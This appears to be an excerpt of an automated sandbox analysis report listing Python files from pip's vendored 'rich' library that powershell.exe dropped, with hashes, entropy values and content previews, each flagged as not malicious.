                                                                                                                                                                                                            Size (bytes):18015
                                                                                                                                                                                                            Entropy (8bit):4.766783025326842
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:hJuVn969GTkveeQwkdFM016GeZzxernEwLPXTocFhr3myNBK+h9quJFreQMg51bN:h9vAwKe/ueRuKBHOqCA2ZeKGYj
                                                                                                                                                                                                            MD5:B05EE37316A3ECB91D5686714A8F2863
                                                                                                                                                                                                            SHA1:D3E59AA5A117FC0D6C490EC537E9FFCDD7178ADD
                                                                                                                                                                                                            SHA-256:19321381F7E3E3B3A7DD82B5BFF2394F608F6491929F25A2A4F203FD89185EAC
                                                                                                                                                                                                            SHA-512:680DF6988D9FA7B37DE5F7A71352DE70510EFF23DED59093C6F9FEE62F7C471249D123EBCBEEC05F79B30F31C5DF4BBDD329C65E7E4CD1BE6F5169A3E31C0A4E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import platform.import re.from colorsys import rgb_to_hls.from enum import IntEnum.from functools import lru_cache.from typing import TYPE_CHECKING, NamedTuple, Optional, Tuple..from ._palettes import EIGHT_BIT_PALETTE, STANDARD_PALETTE, WINDOWS_PALETTE.from .color_triplet import ColorTriplet.from .repr import Result, rich_repr.from .terminal_theme import DEFAULT_TERMINAL_THEME..if TYPE_CHECKING: # pragma: no cover. from .terminal_theme import TerminalTheme. from .text import Text...WINDOWS = platform.system() == "Windows"...class ColorSystem(IntEnum):. """One of the 3 color system supported by terminals.""".. STANDARD = 1. EIGHT_BIT = 2. TRUECOLOR = 3. WINDOWS = 4.. def __repr__(self) -> str:. return f"ColorSystem.{self.name}".. def __str__(self) -> str:. return repr(self)...class ColorType(IntEnum):. """Type of color stored in Color class.""".. DEFAULT = 0. STANDARD = 1. EIGHT_BIT = 2. TRUECOLOR = 3. WINDOWS = 4.. def __r
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1054
                                                                                                                                                                                                            Entropy (8bit):4.462418060312916
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1REljIzx7LgQdWd5feTVgSJQp5YL9SmFTdCv:KcNAQsdd0ezoL9LTdCv
                                                                                                                                                                                                            MD5:9F03FDECBCD28EB49A7572A2EFC85D3A
                                                                                                                                                                                                            SHA1:FA44F6511C7B136D8BF9F3D9C858741F38BC776F
                                                                                                                                                                                                            SHA-256:DE585091D25BBD63E82C33BE0276089805A626F579765818342559F7B39168DE
                                                                                                                                                                                                            SHA-512:73DBBCDA7143ED3AD3F9D11CE8819877BCB2FB6BF39A255C63600C80464DFDAF17BFD2C4C9E174ACC9A09020C7F7C8F6DF92B5CA26C53204337596A9F9A6B7C2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import NamedTuple, Tuple...class ColorTriplet(NamedTuple):. """The red, green, and blue components of a color.""".. red: int. """Red component in 0 to 255 range.""". green: int. """Green component in 0 to 255 range.""". blue: int. """Blue component in 0 to 255 range.""".. @property. def hex(self) -> str:. """get the color triplet in CSS style.""". red, green, blue = self. return f"#{red:02x}{green:02x}{blue:02x}".. @property. def rgb(self) -> str:. """The color in RGB format... Returns:. str: An rgb color, e.g. ``"rgb(100,23,255)"``.. """. red, green, blue = self. return f"rgb({red},{green},{blue})".. @property. def normalized(self) -> Tuple[float, float, float]:. """Convert components into floats between 0 and 1... Returns:. Tuple[float, float, float]: A tuple of three normalized colour components.. """. red, green, blue = self.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7131
                                                                                                                                                                                                            Entropy (8bit):4.238368373370728
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vp1B18+k1DnTktdEP+oRedO/+9//gECw2657r8Ixn8AYLx9EhP1Zo8sMJFqlbI/z:vp7jcDTIE2oQdOuhnYV8YcRz
                                                                                                                                                                                                            MD5:D32C7EF426F5EF568DB7F6FA3ACAAE07
                                                                                                                                                                                                            SHA1:556F2BDD1C7382FA941827C8F2AFCBAB008C1FC6
                                                                                                                                                                                                            SHA-256:1D45F429C326F5DB0A362D757D36E233F876883B65F3248269573195A944CEAF
                                                                                                                                                                                                            SHA-512:5A5A96307A252B2DC2D22C2F73BDF5E64565D1AB2B584DAE826BC5B16061C7C2A0A1A6364FA730A009C1A387A03D8E16F304E26841F5E04EE2E7F69F14A0848A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from collections import defaultdict.from itertools import chain.from operator import itemgetter.from typing import Dict, Iterable, List, Optional, Tuple..from .align import Align, AlignMethod.from .console import Console, ConsoleOptions, RenderableType, RenderResult.from .constrain import Constrain.from .measure import Measurement.from .padding import Padding, PaddingDimensions.from .table import Table.from .text import TextType.from .jupyter import JupyterMixin...class Columns(JupyterMixin):. """Display renderables in neat columns... Args:. renderables (Iterable[RenderableType]): Any number of Rich renderables (including str).. width (int, optional): The desired width of the columns, or None to auto detect. Defaults to None.. padding (PaddingDimensions, optional): Optional padding around cells. Defaults to (0, 1).. expand (bool, optional): Expand columns to full width. Defaults to False.. equal (bool, optional): Arrange in to equal sized column
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):97992
                                                                                                                                                                                                            Entropy (8bit):4.376239245744937
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:zc2QdtDIpSsD9fZXufdeCb62T+9dVGzHxVGiK0:zcTIpSsI0dMxvK0
                                                                                                                                                                                                            MD5:26FD0503FE8DE1D202F1F1B4438E6896
                                                                                                                                                                                                            SHA1:41D7750F2AC450FF73303864D391AFB1F24D9EE9
                                                                                                                                                                                                            SHA-256:C37B497EB20B6694B7E7DC2B36A6A57469B29373C4844995F0F8368361A35D62
                                                                                                                                                                                                            SHA-512:C0103BDFE0B036221EE9AF1C8E6F9B0290DECCFC1F214A1D120CBD72C08DDE9E183630613E31A92397F087729B2F8BDFE83310032B1755C706F8519DFC8479FD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import inspect.import io.import os.import platform.import sys.import threading.import zlib.from abc import ABC, abstractmethod.from dataclasses import dataclass, field.from datetime import datetime.from functools import wraps.from getpass import getpass.from html import escape.from inspect import isclass.from itertools import islice.from math import ceil.from time import monotonic.from types import FrameType, ModuleType, TracebackType.from typing import (. IO,. TYPE_CHECKING,. Any,. Callable,. Dict,. Iterable,. List,. Mapping,. NamedTuple,. Optional,. TextIO,. Tuple,. Type,. Union,. cast,.)..from pip._vendor.rich._null_file import NULL_FILE..if sys.version_info >= (3, 8):. from typing import Literal, Protocol, runtime_checkable.else:. from pip._vendor.typing_extensions import (. Literal,. Protocol,. runtime_checkable,. ) # pragma: no cover..from . import errors, themes.from ._emoji_replace import _emoji_replace
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1288
                                                                                                                                                                                                            Entropy (8bit):4.599111138980669
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RE1+1WaSzhA2VArHmkBUCVNcitLCyeZnFCVN21tL:o+1WaSzRVIHRfVNfEyeZ0VNSL
                                                                                                                                                                                                            MD5:CEF54CEFAA299620F5784FD7767F42E5
                                                                                                                                                                                                            SHA1:97D8B90AB5F8D1EEFB5F75B72A5658391CA58223
                                                                                                                                                                                                            SHA-256:D5520FB82F0082D296ADC9DC42B8C1758A80DC9556CACBBA8D9A35AEB87B73B4
                                                                                                                                                                                                            SHA-512:B1AC9BDA2DE67130B41204FC1F4F760396451DA498C56FA17B209D27ED33449441B1D741240956CFE9199D1368B3CB3663DA73E5898AC4D80D8AA000D74F836F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Optional, TYPE_CHECKING..from .jupyter import JupyterMixin.from .measure import Measurement..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderableType, RenderResult...class Constrain(JupyterMixin):. """Constrain the width of a renderable to a given number of characters... Args:. renderable (RenderableType): A renderable object.. width (int, optional): The maximum width (in characters) to render. Defaults to 80.. """.. def __init__(self, renderable: "RenderableType", width: Optional[int] = 80) -> None:. self.renderable = renderable. self.width = width.. def __rich_console__(. self, console: "Console", options: "ConsoleOptions". ) -> "RenderResult":. if self.width is None:. yield self.renderable. else:. child_options = options.update_width(min(self.width, options.max_width)). yield from console.render(self.renderable, child_options).. def __ri
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5497
                                                                                                                                                                                                            Entropy (8bit):4.329263127642358
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:pGYy1TdIQHYfOcjrtagqGlJAjgEvH67B+7S9a5+BRF:pNy1VHknpagqGSdkh9N5
                                                                                                                                                                                                            MD5:9C40B402021C0BD48D1A9D2E1C78CEEA
                                                                                                                                                                                                            SHA1:C3934805D6943D77AC82FA6FD987D5A229A26D70
                                                                                                                                                                                                            SHA-256:68A826E540C79F9366BA2E8825A29DB1985B1C2961FD7EC3FBF5A0F0486BAFBB
                                                                                                                                                                                                            SHA-512:C922C559556951E1D3F1E0801A30A4D4A658F7BA755D6AE8C3FD9E347F6FE0B4025B337271A073527781DA47FD55D39395004B06FA8AE0E3696971EB6C1FABE1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from itertools import zip_longest.from typing import (. Iterator,. Iterable,. List,. Optional,. Union,. overload,. TypeVar,. TYPE_CHECKING,.)..if TYPE_CHECKING:. from .console import (. Console,. ConsoleOptions,. JustifyMethod,. OverflowMethod,. RenderResult,. RenderableType,. ). from .text import Text..from .cells import cell_len.from .measure import Measurement..T = TypeVar("T")...class Renderables:. """A list subclass which renders its contents to the console.""".. def __init__(. self, renderables: Optional[Iterable["RenderableType"]] = None. ) -> None:. self._renderables: List["RenderableType"] = (. list(renderables) if renderables is not None else []. ).. def __rich_console__(. self, console: "Console", options: "ConsoleOptions". ) -> "RenderResult":. """Console render method to insert line-breaks.""". yield from self._renderables.. def
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6630
                                                                                                                                                                                                            Entropy (8bit):4.821668081667523
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:kZ5z18/voCsHdm6M4lVCEGsL35FwGwglEEOHYdQBmFePpJ45DbXhn3urImuzlVDC:kLzC/voCsHkWEbf45Dl3l1zDk17TsPdI
                                                                                                                                                                                                            MD5:7433E137D8016BB1A4B74B4FF44C8786
                                                                                                                                                                                                            SHA1:59D7C1FB1C7D75955FA319C2D27F341802B8E2F5
                                                                                                                                                                                                            SHA-256:0D29074D440BA2B7D211100A13FA1300450579F667669E1B41BE2AF2B1DB2B0B
                                                                                                                                                                                                            SHA-512:B4F63A2E4A37437DEE7091B2C5B542B8A92979011DE1C8583DA6BE3BC795E4DEA2F870C2A6C8A154AE28FE4D2778F83C73B7B4F22B618458CB7B64E3BCBE313A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import sys.import time.from typing import TYPE_CHECKING, Callable, Dict, Iterable, List, Union..if sys.version_info >= (3, 8):. from typing import Final.else:. from pip._vendor.typing_extensions import Final # pragma: no cover..from .segment import ControlCode, ControlType, Segment..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderResult..STRIP_CONTROL_CODES: Final = [. 7, # Bell. 8, # Backspace. 11, # Vertical tab. 12, # Form feed. 13, # Carriage return.]._CONTROL_STRIP_TRANSLATE: Final = {. _codepoint: None for _codepoint in STRIP_CONTROL_CODES.}..CONTROL_ESCAPE: Final = {. 7: "\\a",. 8: "\\b",. 11: "\\v",. 12: "\\f",. 13: "\\r",.}..CONTROL_CODES_FORMAT: Dict[int, Callable[..., str]] = {. ControlType.BELL: lambda: "\x07",. ControlType.CARRIAGE_RETURN: lambda: "\r",. ControlType.HOME: lambda: "\x1b[H",. ControlType.CLEAR: lambda: "\x1b[2J",. ControlType.ENABLE_ALT_SCREEN: lambda: "\x1b[?1049h",. Co
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7954
                                                                                                                                                                                                            Entropy (8bit):4.761723814449432
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CIhaHDDcBOaaWJH8ZhQvHsS2Kb78OORadcgIpRi:CHyYWd8ZhQvHTOgyg
                                                                                                                                                                                                            MD5:3F40341A6CEDE12DDC56D6E3C4186743
                                                                                                                                                                                                            SHA1:0EEA1614ED39CD3BB48B88694D8D537046F539C8
                                                                                                                                                                                                            SHA-256:5AA561F913CD12CC745B17F77E14BF7C29FEC15AA027A41FA3E660EC2A02B0B1
                                                                                                                                                                                                            SHA-512:A4F8154143C0BE0A6578760CAAD2E7AFD5ED9C7B3D527C2861B35BC7BC5AA3BA4B695F5668A59483FFF31769688E8E35E0142ECA9967E082592CCC0F07300C1A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Dict..from .style import Style..DEFAULT_STYLES: Dict[str, Style] = {. "none": Style.null(),. "reset": Style(. color="default",. bgcolor="default",. dim=False,. bold=False,. italic=False,. underline=False,. blink=False,. blink2=False,. reverse=False,. conceal=False,. strike=False,. ),. "dim": Style(dim=True),. "bright": Style(dim=False),. "bold": Style(bold=True),. "strong": Style(bold=True),. "code": Style(reverse=True, bold=True),. "italic": Style(italic=True),. "emphasize": Style(italic=True),. "underline": Style(underline=True),. "blink": Style(blink=True),. "blink2": Style(blink2=True),. "reverse": Style(reverse=True),. "strike": Style(strike=True),. "black": Style(color="black"),. "red": Style(color="red"),. "green": Style(color="green"),. "yellow": Style(color="yellow"),. "magenta": Style(color="magenta"),. "cyan": Style(co
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):972
                                                                                                                                                                                                            Entropy (8bit):4.876444691653009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:Ydpabdpd+DdpLIdpLqpWMrjuw+iuKNb80cnIVpez:0qdOI2pXrKwVbiuQz
                                                                                                                                                                                                            MD5:406E905B4D37AC878EB81DECB7F4492E
                                                                                                                                                                                                            SHA1:A8D91B9A64A8C1FF92990CD44035812DA8217C92
                                                                                                                                                                                                            SHA-256:6A7EAEA2EC2128F025BD0858A4D3691AAF44272B1F3083AFBC26CEDE84A8476E
                                                                                                                                                                                                            SHA-512:4F1EE27081D6440B0F87C3A7BDABDC569D7A60B0AC888310E66BBCA4E92E7CD53625BAC7F91005B061ECF301C9834A9E859B3BCBBE0CA8850C6C411D8BADA604
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import os.import platform..from pip._vendor.rich import inspect.from pip._vendor.rich.console import Console, get_windows_console_features.from pip._vendor.rich.panel import Panel.from pip._vendor.rich.pretty import Pretty...def report() -> None: # pragma: no cover. """Print a report to the terminal with debugging information""". console = Console(). inspect(console). features = get_windows_console_features(). inspect(features).. env_names = (. "TERM",. "COLORTERM",. "CLICOLOR",. "NO_COLOR",. "TERM_PROGRAM",. "COLUMNS",. "LINES",. "JUPYTER_COLUMNS",. "JUPYTER_LINES",. "JPY_PARENT_PID",. "VSCODE_VERBOSE_LOGGING",. ). env = {name: os.getenv(name) for name in env_names}. console.print(Panel.fit((Pretty(env)), title="[b]Environment Variables")).. console.print(f'platform="{platform.system()}"')...if __name__ == "__main__": # pragma: no cover. report().
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2501
                                                                                                                                                                                                            Entropy (8bit):4.679926907315138
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:kfelXZojWF4yi1WFEDSZVNwNw5zkWa/d3PICMnDJmdw4fVN2ckS2doEk:kWlpojWF4P14EuZVNp5zkFwIdlQckS2S
                                                                                                                                                                                                            MD5:E82E259FA587CB47774281DBAA8FF256
                                                                                                                                                                                                            SHA1:23A65B3DC99D265648ECC0517AA97C8FE767020E
                                                                                                                                                                                                            SHA-256:A264C5F5AB1A027B0CE322D8F78791FFD7604514A6D651D4B335F6D03D726024
                                                                                                                                                                                                            SHA-512:379DF43D4205E5BBCA593D42A1F8D0BF64BB42BC333135D2F37DEC0419ADB21EB5E525C173EBCA55345A66A4F71DD20FBC3DFA995D7BC192D5852888ADE65223
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import sys.from typing import TYPE_CHECKING, Optional, Union..from .jupyter import JupyterMixin.from .segment import Segment.from .style import Style.from ._emoji_codes import EMOJI.from ._emoji_replace import _emoji_replace..if sys.version_info >= (3, 8):. from typing import Literal.else:. from pip._vendor.typing_extensions import Literal # pragma: no cover...if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderResult...EmojiVariant = Literal["emoji", "text"]...class NoEmoji(Exception):. """No emoji by that name."""...class Emoji(JupyterMixin):. __slots__ = ["name", "style", "_char", "variant"].. VARIANTS = {"text": "\uFE0E", "emoji": "\uFE0F"}.. def __init__(. self,. name: str,. style: Union[str, Style] = "none",. variant: Optional[EmojiVariant] = None,. ) -> None:. """A single emoji character... Args:. name (str): Name of emoji.. style (Union[str, Style], optional): Optional st
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):642
                                                                                                                                                                                                            Entropy (8bit):4.516724769327098
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:rcTEwcqi2h0SCu/ABi2rKokoGdEuzCb/AChoyl4qHGr:N6juSCubyKlouEuzCbloOfw
                                                                                                                                                                                                            MD5:B7ED359477B4D6BEB67CE0E6151DA181
                                                                                                                                                                                                            SHA1:CFD7926ADB4A02CB6DF8794999212C6F026AF1F1
                                                                                                                                                                                                            SHA-256:E693F729CE5DE1027F734285B31ADFCA18E23D57BB275CCEA9215B140CDC57E6
                                                                                                                                                                                                            SHA-512:25D444DB76150D745C7C2999A50C0DECA140E000072440729B177808959BF8F3CAC42C475A12F81A379300C8C3E3B9E76317319D12C0A79D8AF9D50748A4574A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:class ConsoleError(Exception):. """An error in console operation."""...class StyleError(Exception):. """An error in styles."""...class StyleSyntaxError(ConsoleError):. """Style was badly formatted."""...class MissingStyle(StyleError):. """No such style."""...class StyleStackError(ConsoleError):. """Style stack is invalid."""...class NotRenderableError(ConsoleError):. """Object is not renderable."""...class MarkupError(ConsoleError):. """Markup was badly formatted."""...class LiveError(ConsoleError):. """Error related to Live display."""...class NoAltScreen(ConsoleError):. """Alt screen mode was required.""".
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1616
                                                                                                                                                                                                            Entropy (8bit):4.325440820379568
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:DWGfMhcNFoKA54Y3V7oeWQ5CiCc3VbZaoR5k5CVE85yGazSO9eDy5:yGk2NFoKpqV6QUiCSDR2CVPJehr
                                                                                                                                                                                                            MD5:F8083EAB5421E88835043DF182A49C35
                                                                                                                                                                                                            SHA1:0A4E2879E2D6233171C793F9D10A3FB110A398DF
                                                                                                                                                                                                            SHA-256:E2009B1915E0D2B5B7E4F95A7F4515BE3DDD7C4347BB373F9FC23F741AB123BA
                                                                                                                                                                                                            SHA-512:3FA8FFBC1B055EA3D199DC5AFDC988F096D9147B7223234B851A356F70E1E1C8BCA55353918FF0BEE4C7B463D3763CE9B5FB037959394107253D5E9242CDEE42
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import io.from typing import IO, TYPE_CHECKING, Any, List..from .ansi import AnsiDecoder.from .text import Text..if TYPE_CHECKING:. from .console import Console...class FileProxy(io.TextIOBase):. """Wraps a file (e.g. sys.stdout) and redirects writes to a console.""".. def __init__(self, console: "Console", file: IO[str]) -> None:. self.__console = console. self.__file = file. self.__buffer: List[str] = []. self.__ansi_decoder = AnsiDecoder().. @property. def rich_proxied_file(self) -> IO[str]:. """Get proxied file.""". return self.__file.. def __getattr__(self, name: str) -> Any:. return getattr(self.__file, name).. def write(self, text: str) -> int:. if not isinstance(text, str):. raise TypeError(f"write() argument must be str, not {type(text).__name__}"). buffer = self.__buffer. lines: List[str] = []. while text:. line, new_line, text = text.partition("\n").
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2508
                                                                                                                                                                                                            Entropy (8bit):4.67502595075713
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:A0ui7on+74Z+QEXuiQ1mdxybusu8h/gjIUkaN/okR3:572Y9Xuiz7+up0oqaN/okR3
                                                                                                                                                                                                            MD5:AFA45BB4BF3F0CFB52834633577D8C76
                                                                                                                                                                                                            SHA1:E9B82AC44BD515E9BAE642FF0361163D5F9DB497
                                                                                                                                                                                                            SHA-256:F5F4CB00F080C079815DD46FECA654D7DE234A036B45BE96C7B448A0182A78A6
                                                                                                                                                                                                            SHA-512:6BA700D004503308230880FFA7679983A057AF93B52C744F0232C5165117DA9310B12BD242DF3FE41E227C4D9EF5310FCBBF82E9522D1284A7CE1EFD576A08BA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# coding: utf-8."""Functions for reporting filesizes. Borrowed from https://github.com/PyFilesystem/pyfilesystem2..The functions declared in this module should cover the different.use cases needed to generate a string representation of a file size.using several different units. Since there are many standards regarding.file size units, three different functions have been implemented...See Also:. * `Wikipedia: Binary prefix <https://en.wikipedia.org/wiki/Binary_prefix>`_.."""..__all__ = ["decimal"]..from typing import Iterable, List, Optional, Tuple...def _to_str(. size: int,. suffixes: Iterable[str],. base: int,. *,. precision: Optional[int] = 1,. separator: Optional[str] = " ",.) -> str:. if size == 1:. return "1 byte". elif size < base:. return "{:,} bytes".format(size).. for i, suffix in enumerate(suffixes, 2): # noqa: B007. unit = base**i. if size < unit:. break. return "{:,.{precision}f}{separator}{}".format(.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9585
                                                                                                                                                                                                            Entropy (8bit):5.270496796287506
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:SLbENaptpKpWejWpx5uusB7ugLUL3dI90idFlJY1:abEH2PsUL3E0h1
                                                                                                                                                                                                            MD5:F36A0995312B13C94D09D9C6552C4186
                                                                                                                                                                                                            SHA1:C780659EBDD4206DE204FC74DA9F0747374E42E2
                                                                                                                                                                                                            SHA-256:DD65BA3C008696AD1EDD80E37EA88C050D1D619C2EEE9728158520272D359DBD
                                                                                                                                                                                                            SHA-512:B31D4C242BE73BAB71448C2E2846B450D1C3AAC855575056318E6367178E155DBDE15224BFAE1301FD375B43DC3315BD4ACF1F725054D913E1249C3D97A3F5FB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import re.from abc import ABC, abstractmethod.from typing import List, Union..from .text import Span, Text...def _combine_regex(*regexes: str) -> str:. """Combine a number of regexes in to a single regex... Returns:. str: New regex with all regexes ORed together.. """. return "|".join(regexes)...class Highlighter(ABC):. """Abstract base class for highlighters.""".. def __call__(self, text: Union[str, Text]) -> Text:. """Highlight a str or Text instance... Args:. text (Union[str, ~Text]): Text to highlight... Raises:. TypeError: If not called with text or str... Returns:. Text: A test instance with highlighting applied.. """. if isinstance(text, str):. highlight_text = Text(text). elif isinstance(text, Text):. highlight_text = text.copy(). else:. raise TypeError(f"str or Text instance required, not {text!r}"). self.highlight(highlight_
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5053
                                                                                                                                                                                                            Entropy (8bit):4.45697863108585
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:XTCrl97vb7yITrKGcvjP0fuviKay0TRGcvjP0fUAqdkGKnNbv77y4TwQlxetzSIv:X6b77rr28ndkGIp7rwIYhpv/lqz2BdFR
                                                                                                                                                                                                            MD5:4A8373766D51BCFD517A0DFB8AE44660
                                                                                                                                                                                                            SHA1:A996B9E7F7E25FA24D3995979C45A13FD481E677
                                                                                                                                                                                                            SHA-256:4E67859BDE94B5AA2FF857F99A26AF04F368E751D1A2833C4BBF07130AD81230
                                                                                                                                                                                                            SHA-512:DAEE6BDEF76D705F1107991770B115EDC956D66BFC07EB5FA23DC9B0D5CA1CD49837A81172B46A4B66DFF4270CCEB03EDC3D2F46A97880A12E77395478C9719D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from json import loads, dumps.from typing import Any, Callable, Optional, Union..from .text import Text.from .highlighter import JSONHighlighter, NullHighlighter...class JSON:. """A renderable which pretty prints JSON... Args:. json (str): JSON encoded data.. indent (Union[None, int, str], optional): Number of characters to indent by. Defaults to 2.. highlight (bool, optional): Enable highlighting. Defaults to True.. skip_keys (bool, optional): Skip keys not of a basic type. Defaults to False.. ensure_ascii (bool, optional): Escape all non-ascii characters. Defaults to False.. check_circular (bool, optional): Check for circular references. Defaults to True.. allow_nan (bool, optional): Allow NaN and Infinity values. Defaults to True.. default (Callable, optional): A callable that converts values that can not be encoded. in to something that can be JSON encoded. Defaults to None.. sort_keys (bool, optional):
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3252
                                                                                                                                                                                                            Entropy (8bit):4.818269455687887
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CqdPzdFs8S2mon5AN2DVhPnpylL6Q/di2hJg3uD:ddPzdPwon5AUVhPoGQ/c27hD
                                                                                                                                                                                                            MD5:CCE8F456C0E1F372C594B6091695EA72
                                                                                                                                                                                                            SHA1:4CCDAB1925739170A634B5E3507C6249A3FFC649
                                                                                                                                                                                                            SHA-256:432A0AA04FFC21D09BAED8921E9F53B1348DC931D8D053B9C2113B8CE4DDF541
                                                                                                                                                                                                            SHA-512:6B48A5FD44791635160839F9ACBBE366282351BFC3670F17AA93C030A97FDBC2AF10F9DD1791E894C78E1EE9BAFE32782831D2C0064F917CD84C40D299A0484D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
